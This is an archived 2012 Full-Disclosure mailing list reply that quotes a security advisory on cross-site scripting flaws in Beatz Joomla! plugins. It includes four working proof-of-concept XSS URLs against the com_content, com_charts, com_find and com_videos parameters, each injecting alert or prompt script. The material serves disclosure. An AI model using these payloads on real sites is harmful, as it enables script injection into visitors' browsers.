[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <4F8BDABA.6070605@hackers.it>
Date: Mon, 16 Apr 2012 10:39:22 +0200
From: David3 Gonnella <netevil@...kers.it>
To: YGN Ethical Hacker Group <lists@...g.net>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: Joomla! Plugin - Beatz 1.x <= Multiple Cross
Site Scripting Vulnerabilities
poc on localhost is a bit unreachable... fbvfdjkh3ruifwqebdf
On 04/15/12 18:39, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
>
> Beatz 1.x versions are vulnerable to Cross Site Scripting.
>
>
> 2. BACKGROUND
>
> Beatz is a set of powerful Social Networking Script Joomla! 1.5
> plugins that allows you to start your own favourite artist band
> website. Although it is just a Joomla! plugin, it comes with full
> Joolma! bundle for ease of use and installation.
>
>
> 3. VULNERABILITY DESCRIPTION
>
> Multiple parameters were not properly sanitized upon submission, which
> allows attacker to conduct Cross Site Scripting attack. This may allow
> an attacker to create a specially crafted URL that would execute
> arbitrary script code in a victim's browser. The vulnerable plugins
> include: com_find, com_charts and com_videos.
>
>
> 4. VERSIONS AFFECTED
>
> Tested in 1.x versions
>
>
> 5. PROOF-OF-CONCEPT/EXPLOIT
>
> == Generic Joomla! 1.5 Double Encoding XSS
>
> http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
>
> == com_charts (parameter: do)
>
> http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
>
> == com_find (parameter: keyword)
>
> http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find
>
> == com_videos (parameter: video_keyword)
>
> http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search
>
>
> 6. SOLUTION
>
> The vendor hasn't released the fixed yet.
>
>
> 7. VENDOR
>
> Cogzidel Technologies Pvt Ltd.
> http://www.cogzidel.com/
>
>
> 8. CREDIT
>
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
>
>
> 9. DISCLOSURE TIME-LINE
>
> 2011-03-01: notified vendor
> 2012-04-15: vulnerability disclosed
>
>
> 10. REFERENCES
>
> Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss
>
> #yehg [2012-04-15]
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Download attachment "0xB95E8B49.asc" of type "application/pgp-keys" (1737 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists